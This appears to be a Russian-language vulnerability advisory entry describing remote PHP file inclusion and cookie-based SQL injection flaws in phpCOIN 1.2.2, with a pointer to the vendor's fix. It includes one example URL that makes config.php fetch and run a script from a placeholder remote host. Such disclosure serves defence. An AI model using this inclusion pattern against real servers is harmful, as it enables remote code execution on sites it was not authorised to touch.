Дата публикации: | 20.12.2005 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 4597 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Раскрытие системных данных Неавторизованное изменение данных Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | phpCOIN 1.x |
Уязвимые версии: phpCOIN 1.2.2
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "_CCFG[_PKG_PATH_DBSE]" сценария "config.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для успешной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример: http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location] 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpcoinsessid" файла куки. Удаленный пользователь может с помощью специально сформированного файла куки выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации уязвимости опция "magic_quotes_gpc" должна быть выключенной. URL производителя: www.phpcoin.com Решение: Установите исправленную версию (1.2.2 от 2005-12-13) с сайта производителя. Источник: |
|
Ссылки: | PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure |